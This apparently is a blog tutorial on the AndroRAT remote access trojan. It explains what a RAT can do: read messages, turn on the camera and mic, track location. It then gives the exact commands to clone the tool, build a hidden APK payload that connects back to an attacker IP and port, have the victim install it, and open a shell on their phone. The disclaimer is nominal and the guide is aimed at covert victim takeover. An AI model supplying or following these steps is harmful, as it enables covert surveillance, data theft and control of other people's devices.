What is AndroRAT ?
You must have heard the name of RAT? No, we are not talking about a mouse, but we are talking about a Remote Access Trojan (RAT). It is actually a dangerous malware, which is used for hacking and monitoring. With the help of this, any phone or computer can be hacked in a few seconds. And can be controlled remotely. But the question is how? After all, what is RAT (Remote Access Trojan)? And how does it work? Come on, let’s know.
RAT (Remote Access Trojan)
As you all know that malware attack is one of the most popular methods of hacking. And it includes many types of malwares. Such as Virus, Trojan, Worm, Rootkit, Ransomeware, Spyware, RAT, Logic Bomb, Keylogger, Botnet etc. But here we will only talk about RAT (Remote Access Trojan).
Although RAT and Trojan Horse have many similarities. But the purpose and way of working of both are completely different. Trojan Horse where data is used for theft. At the same time, RAT is used in tasks like spying and monitoring. But there is one feature which is common in both. Actually, with the help of both of these, the device can be controlled remotely. And user activities can be tracked. But the question is, what is RAT? And how dangerous is it? Come on, let’s know.
What is RAT?
RAT is actually a malware program, which gives a user complete control over his target device. And lets you control the device remotely. That is, with the help of RAT, the user can target any device. And can control it sitting far away. But Victim does not know about it. Because it works by hiding under the guise of other programs. Well the full form of RAT is Remote Access Trojan. But it is also called Remote Access Tool and Remote Administration Tool.
What can RAT do?
By the way, RAT (Remote Access Trojan) can do anything. Because he has administrative control. But still, if we talk about specific tasks, then a RAT can do the following tasks: –
- Can view, edit, delete the data present in the device.
- Can call on any number. Can view call history can delete call history.
- Can read your emails and messages.
- Can send and delete emails and messages.
- Can do Internet browsing, can download files. And can see your browsing history.
- Can record photos and videos by turning on the camera.
- Can record voice by turning on the mic and can hear your words.
- Can use, delete the Apps and Software present in the device.
- Can take screenshot.
- Get current location, sim card details ,ip, mac address of the device
How to install AndroRAT in Termux
First you need to install the Kali Nethunter (Kali Linux) in your Termux because this RAT only can run in Kali Nethunter. If you Dont know how to install Kali Nethunter in your Termux then click below and see the post.
You can install AndroRAT in Termux by following commands. Enter this commands in Kali Nethunter (Kali Linux) not in Termux.
To open Kali Nethunter (Kali Linux) in Termux just type nh -r and hit enter.
(NOTE-: Use this RAT at your own risk I am not responsible for any illegal activities by using this RAT)
apt-get update apt-get upgrade -y git clone https://github.com/karma9874/AndroRAT.git cd AndroRAT pip install colorama pip install -r requirements.txt
For build apk payload file use the following command.
If you want to attack on WAN network then replace this 127.0.0.1 with your ip address and 4444 with your port number.
If you want to create hidden payload without icon then enter below command.
python3 androRAT.py --build -i 127.0.0.1 -p 4444 -o /sdcard/sandeep.apk
To see the hidden payload or Uninstall the hidden payload just open your phones dialer and dial *#*#1337#*#*
If you want to create payload with icon then enter below command.
python3 androRAT.py --build -icon -i 127.0.0.1 -p 4444 -o /sdcard/sandeep.apk
Now wait 1-2 minutes then sandeep.apk payload file save in your phones Internal Storage.
Now share this file in your victims mobile and install it.
Now to take a control of victims mobile just use the following command.
Replace the IP address -i and Port -p which you use for creating this payload.
python3 androRAT.py --shell -i 127.0.0.1 -p 4444
You can see you will get the connection of victims mobile you can type help command to see the command list.
Thats IT !!!